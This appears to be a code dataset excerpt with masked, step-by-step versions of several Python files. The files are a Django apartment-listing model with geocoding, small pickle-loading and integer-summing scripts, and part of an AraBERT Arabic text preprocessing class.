models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n parking = 
models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n objects = ApartmentManager()\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return 'apartments:detail', [str(self.id)]\n\n def get_full_address(self):\n return '{0}, {1} {2}'.format(self.address, self.postcode, self.area\n .city.name.upper())\n\n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n searchable = '{0}, {1} {2}, Finland'.format(self.address, self.\n postcode, self.area.city)\n address, (lat, lng) = geocoder.geocode(searchable, exactly_one=True)\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n",
"step-3": "<mask token>\n\n\nclass City(models.Model):\n name = models.CharField(max_length=30, unique=True)\n\n\n class Meta:\n ordering = 'name',\n verbose_name_plural = 'cities'\n\n def __unicode__(self):\n return self.name\n\n\nclass Area(models.Model):\n name = models.CharField(max_length=50)\n city = models.ForeignKey(City)\n\n\n class Meta:\n unique_together = 'name', 'city'\n ordering = 'name',\n\n def __unicode__(self):\n return self.name\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n return self.filter(is_available=True, tenant__is_active=True)\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related('area',\n 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n if search:\n search = search.strip()\n if not search:\n return self.none()\n search_fields = ('area__name__iexact', 'area__city__name__iexact',\n 'postcode__iexact', 'address__icontains')\n criteria = [Q(**{field: search}) for field in search_fields]\n return self.filter(reduce(operator.or_, criteria))\n\n\nclass Apartment(models.Model):\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE = 4\n TYPE_CHOICES = (TYPE_APARTMENT, 'Apartment'), (TYPE_DETACHED,\n 'Detached house'), (TYPE_SEMIDETACHED, 'Semi-detached house'), (\n TYPE_COTTAGE, 'Cottage')\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n SAUNA_CHOICES = (SAUNA_NONE, 'No sauna'), (SAUNA_SHARED,\n 'Shared/communal sauna'), (SAUNA_OWN, 'Own sauna')\n ROOM_CHOICES = (1, '1 room'), (2, '2 rooms'), (3, '3 rooms'), (4, '4 rooms'\n )\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n LANDLORD_CHOICES = (LANDLORD_TENANT, 'Occupant'), (LANDLORD_PRIVATE,\n 'Private landlord'), (LANDLORD_AGENCY, 'Rental agency')\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n landlord = models.IntegerField(choices=LANDLORD_CHOICES, default=\n LANDLORD_PRIVATE)\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n is_shared = models.BooleanField('Shared accomodation', default=False)\n type = models.IntegerField(choices=TYPE_CHOICES, default=TYPE_APARTMENT)\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n sauna = models.IntegerField(choices=SAUNA_CHOICES, default=SAUNA_NONE)\n rent_pcm = models.DecimalField(decimal_places=2, max_digits=8)\n deposit = models.DecimalField(decimal_places=2, max_digits=8, null=True,\n blank=True)\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = 
models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n objects = ApartmentManager()\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return 'apartments:detail', [str(self.id)]\n\n def get_full_address(self):\n return '{0}, {1} {2}'.format(self.address, self.postcode, self.area\n .city.name.upper())\n\n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n searchable = '{0}, {1} {2}, Finland'.format(self.address, self.\n postcode, self.area.city)\n address, (lat, lng) = geocoder.geocode(searchable, exactly_one=True)\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n",
"step-4": "<mask token>\ngeocoder = geopy.geocoders.Google()\n\n\nclass City(models.Model):\n name = models.CharField(max_length=30, unique=True)\n\n\n class Meta:\n ordering = 'name',\n verbose_name_plural = 'cities'\n\n def __unicode__(self):\n return self.name\n\n\nclass Area(models.Model):\n name = models.CharField(max_length=50)\n city = models.ForeignKey(City)\n\n\n class Meta:\n unique_together = 'name', 'city'\n ordering = 'name',\n\n def __unicode__(self):\n return self.name\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n return self.filter(is_available=True, tenant__is_active=True)\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related('area',\n 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n if search:\n search = search.strip()\n if not search:\n return self.none()\n search_fields = ('area__name__iexact', 'area__city__name__iexact',\n 'postcode__iexact', 'address__icontains')\n criteria = [Q(**{field: search}) for field in search_fields]\n return self.filter(reduce(operator.or_, criteria))\n\n\nclass Apartment(models.Model):\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE = 4\n TYPE_CHOICES = (TYPE_APARTMENT, 'Apartment'), (TYPE_DETACHED,\n 'Detached house'), (TYPE_SEMIDETACHED, 'Semi-detached house'), (\n TYPE_COTTAGE, 'Cottage')\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n SAUNA_CHOICES = (SAUNA_NONE, 'No sauna'), (SAUNA_SHARED,\n 'Shared/communal sauna'), (SAUNA_OWN, 'Own sauna')\n ROOM_CHOICES = (1, '1 room'), (2, '2 rooms'), (3, '3 rooms'), (4, '4 rooms'\n )\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n LANDLORD_CHOICES = (LANDLORD_TENANT, 'Occupant'), (LANDLORD_PRIVATE,\n 'Private landlord'), (LANDLORD_AGENCY, 'Rental agency')\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n landlord = models.IntegerField(choices=LANDLORD_CHOICES, default=\n LANDLORD_PRIVATE)\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n is_shared = models.BooleanField('Shared accomodation', default=False)\n type = models.IntegerField(choices=TYPE_CHOICES, default=TYPE_APARTMENT)\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n sauna = models.IntegerField(choices=SAUNA_CHOICES, default=SAUNA_NONE)\n rent_pcm = models.DecimalField(decimal_places=2, max_digits=8)\n deposit = models.DecimalField(decimal_places=2, max_digits=8, null=True,\n blank=True)\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = 
models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n objects = ApartmentManager()\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return 'apartments:detail', [str(self.id)]\n\n def get_full_address(self):\n return '{0}, {1} {2}'.format(self.address, self.postcode, self.area\n .city.name.upper())\n\n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n searchable = '{0}, {1} {2}, Finland'.format(self.address, self.\n postcode, self.area.city)\n address, (lat, lng) = geocoder.geocode(searchable, exactly_one=True)\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n",
"step-5": "import datetime\nimport operator\n\nimport geopy\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.db.models.query import QuerySet\nfrom django.db.models import permalink\nfrom django.contrib.auth.models import User\n\n\ngeocoder = geopy.geocoders.Google()\n\n\nclass City(models.Model):\n\n name = models.CharField(max_length=30, unique=True)\n\n class Meta:\n ordering = ('name',)\n verbose_name_plural = \"cities\"\n\n def __unicode__(self):\n return self.name\n\n\nclass Area(models.Model):\n\n name = models.CharField(max_length=50)\n city = models.ForeignKey(City)\n\n class Meta:\n unique_together = ('name', 'city')\n ordering = ('name',)\n\n def __unicode__(self):\n return self.name\n\n\nclass ApartmentQuerySet(QuerySet):\n\n def available(self):\n\n return self.filter(\n is_available=True,\n tenant__is_active=True,\n )\n\n\nclass ApartmentManager(models.Manager):\n\n def get_query_set(self):\n return ApartmentQuerySet(self.model).select_related(\n 'area', 'area__city')\n\n def available(self):\n return self.get_query_set().available()\n\n def search(self, search):\n\n if search:\n search = search.strip()\n\n if not search:\n return self.none()\n\n search_fields = (\n 'area__name__iexact',\n 'area__city__name__iexact',\n 'postcode__iexact',\n 'address__icontains',\n )\n\n criteria = [Q(**{field : search}) \n for field in search_fields]\n\n return self.filter(reduce(operator.or_, criteria))\n \n\nclass Apartment(models.Model):\n\n TYPE_APARTMENT = 1\n TYPE_DETACHED = 2\n TYPE_SEMIDETACHED = 3\n TYPE_COTTAGE =4 \n\n TYPE_CHOICES = (\n (TYPE_APARTMENT, \"Apartment\"),\n (TYPE_DETACHED, \"Detached house\"),\n (TYPE_SEMIDETACHED, \"Semi-detached house\"),\n (TYPE_COTTAGE, \"Cottage\"),\n )\n\n SAUNA_NONE = 1\n SAUNA_SHARED = 2\n SAUNA_OWN = 3\n\n SAUNA_CHOICES = (\n (SAUNA_NONE, \"No sauna\"),\n (SAUNA_SHARED, \"Shared/communal sauna\"),\n (SAUNA_OWN, \"Own sauna\"),\n )\n\n ROOM_CHOICES = (\n (1, \"1 room\"),\n (2, \"2 rooms\"),\n (3, \"3 rooms\"),\n (4, \"4 rooms\"),\n )\n\n LANDLORD_TENANT = 1\n LANDLORD_PRIVATE = 2\n LANDLORD_AGENCY = 3\n\n LANDLORD_CHOICES = (\n (LANDLORD_TENANT, \"Occupant\"),\n (LANDLORD_PRIVATE, \"Private landlord\"),\n (LANDLORD_AGENCY, \"Rental agency\"),\n )\n\n area = models.ForeignKey(Area)\n tenant = models.ForeignKey(User)\n \n landlord = models.IntegerField(\n choices=LANDLORD_CHOICES,\n default=LANDLORD_PRIVATE,\n )\n\n agency = models.CharField(max_length=100, null=True, blank=True)\n agency_website = models.URLField(null=True, blank=True)\n\n address = models.CharField(max_length=100)\n postcode = models.CharField(max_length=7)\n\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n\n added_on = models.DateTimeField(auto_now_add=True)\n is_available = models.BooleanField(default=True)\n available_from = models.DateField(null=True, blank=True)\n available_to = models.DateField(null=True, blank=True)\n\n is_shared = models.BooleanField('Shared accomodation', default=False)\n\n type = models.IntegerField(\n choices=TYPE_CHOICES,\n default=TYPE_APARTMENT,\n )\n\n num_rooms = models.IntegerField('Rooms', choices=ROOM_CHOICES)\n floor = models.IntegerField(null=True, blank=True)\n lift = models.BooleanField(default=False)\n num_floors = models.IntegerField(null=True, blank=True)\n\n sauna = models.IntegerField(\n choices=SAUNA_CHOICES,\n default=SAUNA_NONE,\n )\n\n rent_pcm = models.DecimalField(\n decimal_places=2,\n max_digits=8,\n )\n\n deposit = 
models.DecimalField(\n decimal_places=2,\n max_digits=8,\n null=True,\n blank=True\n )\n\n smoking = models.BooleanField(default=False)\n pets = models.BooleanField(default=False)\n\n size = models.FloatField('Size (sqm)')\n garden_size = models.FloatField(null=True, blank=True)\n\n furnished = models.BooleanField(default=False)\n cable = models.BooleanField(default=False)\n broadband = models.BooleanField(default=False)\n satellite = models.BooleanField(default=False)\n balcony = models.BooleanField(default=False)\n\n parking = models.BooleanField(default=False)\n garage = models.BooleanField(default=False)\n bike_storage = models.BooleanField(default=False)\n extra_storage = models.BooleanField(default=False)\n gym = models.BooleanField(default=False)\n laundry = models.BooleanField(default=False)\n\n description = models.TextField(null=True, blank=True)\n kitchen_amenities = models.TextField(null=True, blank=True)\n furniture = models.TextField(null=True, blank=True)\n heating = models.TextField(null=True, blank=True)\n other_amenities = models.TextField(null=True, blank=True)\n\n\n objects = ApartmentManager()\n\n\n def __unicode__(self):\n return self.get_full_address()\n\n @permalink\n def get_absolute_url(self):\n return ('apartments:detail', [str(self.id)])\n\n def get_full_address(self):\n\n return \"{0}, {1} {2}\".format(\n self.address,\n self.postcode,\n self.area.city.name.upper()\n )\n\n \n def is_agency_landlord(self):\n return self.landlord == self.LANDLORD_AGENCY\n\n def get_location(self):\n\n searchable = \"{0}, {1} {2}, Finland\".format(\n self.address,\n self.postcode,\n self.area.city,\n )\n\n address, (lat, lng) = geocoder.geocode(\n searchable,\n exactly_one=True\n )\n\n return lat, lng\n\n def save(self, *args, **kwargs):\n self.latitude, self.longitude = self.get_location()\n super(Apartment, self).save(*args, **kwargs)\n\n \n",
"step-ids": [
15,
19,
20,
21,
23
]
}
|
[
15,
19,
20,
21,
23
] |
import pickle
if __name__ == '__main__':
with open('id_generator.bin', 'rb') as f:
print(pickle.load(f))
|
normal
|
{
"blob_id": "080110e404cf5edfe53622a5942b53f9188ddd76",
"index": 1854,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n with open('id_generator.bin', 'rb') as f:\n print(pickle.load(f))\n",
"step-3": "import pickle\nif __name__ == '__main__':\n with open('id_generator.bin', 'rb') as f:\n print(pickle.load(f))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
import sys
def sumInput(text):
f = open(text, 'r')
sum = 0
count = 1
for line in f:
count += 1
line = line.strip()
if (line[0] == '+'):
sum += int(line[1:])
else:
sum -= int(line[1:])
f.close()
return sum
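# Expected input format (illustrative): one signed integer per line, e.g.
#   +7
#   -3
#   +10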
def main():
print(sumInput('input.txt'))
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "c0d71d970b2632dbf182a5ee8bad27d3e41578f6",
"index": 208,
"step-1": "<mask token>\n\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if line[0] == '+':\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if line[0] == '+':\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\n\ndef main():\n print(sumInput('input.txt'))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if line[0] == '+':\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\n\ndef main():\n print(sumInput('input.txt'))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\n\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if line[0] == '+':\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\n\ndef main():\n print(sumInput('input.txt'))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3\n\nimport sys\n\ndef sumInput(text):\n f = open(text, 'r')\n sum = 0\n count = 1\n for line in f:\n count += 1\n line = line.strip()\n if (line[0] == '+'):\n sum += int(line[1:])\n else:\n sum -= int(line[1:])\n f.close()\n return sum\n\ndef main():\n print(sumInput('input.txt'))\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import html
import logging
import re
import pyarabic.araby as araby
ACCEPTED_MODELS = [
"bert-base-arabertv01",
"bert-base-arabert",
"bert-base-arabertv02",
"bert-base-arabertv2",
"bert-large-arabertv02",
"bert-large-arabertv2",
"araelectra-base",
"araelectra-base-discriminator",
"araelectra-base-generator",
"aragpt2-base",
"aragpt2-medium",
"aragpt2-large",
"aragpt2-mega",
]
SEGMENTED_MODELS = [
"bert-base-arabert",
"bert-base-arabertv2",
"bert-large-arabertv2",
]
class ArbertmoPreprocessor:
"""
A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.
    It can also unprocess the text output of the generated text.
Args:
model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to "bert-base-arabertv02". Current accepted models are:
- :obj:`"bert-base-arabertv01"`: No farasa segmentation.
- :obj:`"bert-base-arabert"`: with farasa segmentation.
- :obj:`"bert-base-arabertv02"`: No farasas egmentation.
- :obj:`"bert-base-arabertv2"`: with farasa segmentation.
- :obj:`"bert-large-arabertv02"`: No farasas egmentation.
- :obj:`"bert-large-arabertv2"`: with farasa segmentation.
- :obj:`"araelectra-base"`: No farasa segmentation.
- :obj:`"araelectra-base-discriminator"`: No farasa segmentation.
- :obj:`"araelectra-base-generator"`: No farasa segmentation.
- :obj:`"aragpt2-base"`: No farasa segmentation.
- :obj:`"aragpt2-medium"`: No farasa segmentation.
- :obj:`"aragpt2-large"`: No farasa segmentation.
- :obj:`"aragpt2-mega"`: No farasa segmentation.
keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False
        remove_html_markup(:obj: `bool`): Whether to remove html artifacts, should be set to False when preprocessing TyDi QA. Defaults to True
        replace_urls_emails_mentions(:obj: `bool`): Whether to replace emails, urls and mentions with special tokens. Defaults to True
strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)
strip_tatweel(:obj: `bool`): remove tatweel '\\u0640'
        insert_white_spaces(:obj: `bool`): insert whitespace before and after every character that is not an Arabic/English letter, a digit or one of the two bracket characters, then insert whitespace between words and numbers or numbers and words
        remove_elongation(:obj: `bool`): replace any repetition of more than 2 non-digit characters with 2 of that character
Returns:
        ArbertmoPreprocessor: the preprocessor class
    Example:
        from preprocess import ArbertmoPreprocessor
        arabert_prep = ArbertmoPreprocessor("aubmindlab/bert-base-arabertv2")
        arabert_prep.preprocess("SOME ARABIC TEXT")
"""
def __init__(
self,
model_name,
keep_emojis=False,
remove_html_markup=True,
replace_urls_emails_mentions=True,
strip_tashkeel=True,
strip_tatweel=True,
insert_white_spaces=True,
remove_elongation=True,
):
"""
model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to "bert-base-arabertv02". Current accepted models are:
- :obj:`"bert-base-arabertv01"`: No farasa segmentation.
- :obj:`"bert-base-arabert"`: with farasa segmentation.
- :obj:`"bert-base-arabertv02"`: No farasas egmentation.
- :obj:`"bert-base-arabertv2"`: with farasa segmentation.
- :obj:`"bert-large-arabertv02"`: No farasas egmentation.
- :obj:`"bert-large-arabertv2"`: with farasa segmentation.
- :obj:`"araelectra-base"`: No farasa segmentation.
- :obj:`"araelectra-base-discriminator"`: No farasa segmentation.
- :obj:`"araelectra-base-generator"`: No farasa segmentation.
- :obj:`"aragpt2-base"`: No farasa segmentation.
- :obj:`"aragpt2-medium"`: No farasa segmentation.
- :obj:`"aragpt2-large"`: No farasa segmentation.
- :obj:`"aragpt2-mega"`: No farasa segmentation.
keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False
        remove_html_markup(:obj: `bool`): Whether to remove html artifacts, should be set to False when preprocessing TyDi QA. Defaults to True
        replace_urls_emails_mentions(:obj: `bool`): Whether to replace emails, urls and mentions with special tokens. Defaults to True
strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)
strip_tatweel(:obj: `bool`): remove tatweel '\\u0640'
        insert_white_spaces(:obj: `bool`): insert whitespace before and after every character that is not an Arabic/English letter, a digit or one of the two bracket characters, then insert whitespace between words and numbers or numbers and words
        remove_elongation(:obj: `bool`): replace any repetition of more than 2 non-digit characters with 2 of that character
"""
model_name = model_name.replace("aubmindlab/", "")
if model_name not in ACCEPTED_MODELS:
logging.warning(
"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation"
)
self.model_name = "bert-base-arabertv02"
else:
self.model_name = model_name
if self.model_name in SEGMENTED_MODELS:
logging.info(
"Selected Model requires pre-segmentation, Initializing FarasaSegmenter"
)
try:
from farasa.segmenter import FarasaSegmenter
self.farasa_segmenter = FarasaSegmenter(interactive=True)
except:
logging.warning(
"farasapy is not installed, you want be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy"
)
else:
logging.info(
"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization"
)
self.keep_emojis = keep_emojis
if self.keep_emojis:
import emoji
self.emoji = emoji
if self.model_name in SEGMENTED_MODELS:
logging.warning(
"Keeping tweets with Farasa Segmentation is 10 times slower"
)
self.remove_html_markup = remove_html_markup
self.replace_urls_emails_mentions = replace_urls_emails_mentions
self.strip_tashkeel = strip_tashkeel
self.strip_tatweel = strip_tatweel
self.insert_white_spaces = insert_white_spaces
self.remove_elongation = remove_elongation
def preprocess(self, text):
"""
        Preprocess takes an input text line and applies the same preprocessing used in AraBERT
pretraining
Args:
            text (:obj:`str`): input text string
Returns:
string: A preprocessed string depending on which model was selected
"""
if self.model_name == "bert-base-arabert":
return self._old_preprocess(
text,
do_farasa_tokenization=True,
)
if self.model_name == "bert-base-arabertv01":
return self._old_preprocess(text, do_farasa_tokenization=False)
text = str(text)
text = html.unescape(text)
if self.strip_tashkeel:
text = araby.strip_tashkeel(text)
if self.strip_tatweel:
text = araby.strip_tatweel(text)
if self.replace_urls_emails_mentions:
# replace all possible URLs
for reg in url_regexes:
text = re.sub(reg, " [رابط] ", text)
            # Replace emails with [بريد]
for reg in email_regexes:
text = re.sub(reg, " [بريد] ", text)
# replace mentions with [مستخدم]
text = re.sub(user_mention_regex, " [مستخدم] ", text)
if self.remove_html_markup:
# remove html line breaks
text = re.sub("<br />", " ", text)
# remove html markup
text = re.sub("</?[^>]+>", " ", text)
# remove repeated characters >2
if self.remove_elongation:
text = self._remove_elongation(text)
# insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets
if self.insert_white_spaces:
text = re.sub(
"([^0-9\u0621-\u063A\u0641-\u064A\u0660-\u0669a-zA-Z\[\]])",
r" \1 ",
text,
)
# insert whitespace between words and numbers or numbers and words
text = re.sub(
"(\d+)([\u0621-\u063A\u0641-\u064A\u0660-\u066C]+)", r" \1 \2 ", text
)
text = re.sub(
"([\u0621-\u063A\u0641-\u064A\u0660-\u066C]+)(\d+)", r" \1 \2 ", text
)
# remove unwanted characters
if self.keep_emojis:
emoji_regex = "".join(list(self.emoji.UNICODE_EMOJI["en"].keys()))
rejected_chars_regex2 = "[^%s%s]" % (chars_regex, emoji_regex)
text = re.sub(rejected_chars_regex2, " ", text)
else:
text = re.sub(rejected_chars_regex, " ", text)
# remove extra spaces
text = " ".join(text.replace("\uFE0F", "").split())
if (
self.model_name == "bert-base-arabertv2"
or self.model_name == "bert-large-arabertv2"
):
if self.keep_emojis:
new_text = []
for word in text.split():
if word in list(self.emoji.UNICODE_EMOJI["en"].keys()):
new_text.append(word)
else:
new_text.append(self.farasa_segmenter.segment(word))
text = " ".join(new_text)
else:
text = self.farasa_segmenter.segment(text)
return self._farasa_segment(text)
# ALl the other models dont require Farasa Segmentation
return text
def unpreprocess(self, text, desegment=True):
"""Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.
The objective is to make the generated text of any model appear natural and not preprocessed.
Args:
text (str): input text to be un-preprocessed
desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.
Returns:
str: The unpreprocessed (and possibly Farasa-desegmented) text.
"""
if self.model_name in SEGMENTED_MODELS and desegment:
text = self.desegment(text)
# removes the spaces around quotation marks ex: i " ate " an apple --> i "ate" an apple
# https://stackoverflow.com/a/53436792/5381220
text = re.sub(white_spaced_double_quotation_regex, '"' + r"\1" + '"', text)
text = re.sub(white_spaced_single_quotation_regex, "'" + r"\1" + "'", text)
text = re.sub(white_spaced_back_quotation_regex, "\`" + r"\1" + "\`", text)
text = re.sub(white_spaced_back_quotation_regex, "\—" + r"\1" + "\—", text)
# during generation, sometimes the models don't put a space after the dot, this handles it
text = text.replace(".", " . ")
text = " ".join(text.split())
# handle decimals
text = re.sub(r"(\d+) \. (\d+)", r"\1.\2", text)
text = re.sub(r"(\d+) \, (\d+)", r"\1,\2", text)
text = re.sub(left_and_right_spaced_chars, r"\1", text)
text = re.sub(left_spaced_chars, r"\1", text)
text = re.sub(right_spaced_chars, r"\1", text)
return text
def desegment(self, text):
"""
Use this function if sentence tokenization was done using
`from arabert.preprocess_arabert import preprocess` with Farasa enabled
        AraBERT segmentation using Farasa adds a space after the '+' for prefixes,
        and a space before the '+' for suffixes
Example:
>>> desegment('ال+ دراس +ات')
الدراسات
"""
text = text.replace("+ ", "+")
text = text.replace(" +", "+")
text = " ".join([self._desegmentword(word) for word in text.split(" ")])
return text
def _desegmentword(self, orig_word: str) -> str:
"""
Word segmentor that takes a Farasa Segmented Word and removes the '+' signs
Example:
>>> _desegmentword("ال+يومي+ة")
اليومية
"""
word = orig_word.replace("ل+ال+", "لل")
if "ال+ال" not in orig_word:
word = word.replace("ل+ال", "لل")
word = word.replace("+", "")
word = word.replace("للل", "لل")
return word
def _old_preprocess(self, text, do_farasa_tokenization):
"""
AraBERTv1 preprocessing Function
"""
text = str(text)
if self.strip_tashkeel:
text = araby.strip_tashkeel(text)
text = re.sub(r"\d+\/[ء-ي]+\/\d+\]", "", text)
text = re.sub("ـ", "", text)
text = re.sub("[«»]", ' " ', text)
if self.replace_urls_emails_mentions:
# replace the [رابط] token with space if you want to clean links
text = re.sub(regex_url_step1, "[رابط]", text)
text = re.sub(regex_url_step2, "[رابط]", text)
text = re.sub(regex_url, "[رابط]", text)
text = re.sub(regex_email, "[بريد]", text)
text = re.sub(regex_mention, "[مستخدم]", text)
text = re.sub("…", r"\.", text).strip()
text = self._remove_redundant_punct(text)
if self.replace_urls_emails_mentions:
text = re.sub(r"\[ رابط \]|\[ رابط\]|\[رابط \]", " [رابط] ", text)
text = re.sub(r"\[ بريد \]|\[ بريد\]|\[بريد \]", " [بريد] ", text)
text = re.sub(r"\[ مستخدم \]|\[ مستخدم\]|\[مستخدم \]", " [مستخدم] ", text)
if self.remove_elongation:
text = self._remove_elongation(text)
if self.insert_white_spaces:
text = re.sub(
"([^0-9\u0621-\u063A\u0641-\u0669\u0671-\u0673a-zA-Z\[\]])",
r" \1 ",
text,
)
if do_farasa_tokenization:
text = self._tokenize_arabic_words_farasa(text)
return text.strip()
def _farasa_segment(self, text):
line_farasa = text.split()
segmented_line = []
for index, word in enumerate(line_farasa):
if word in ["[", "]"]:
continue
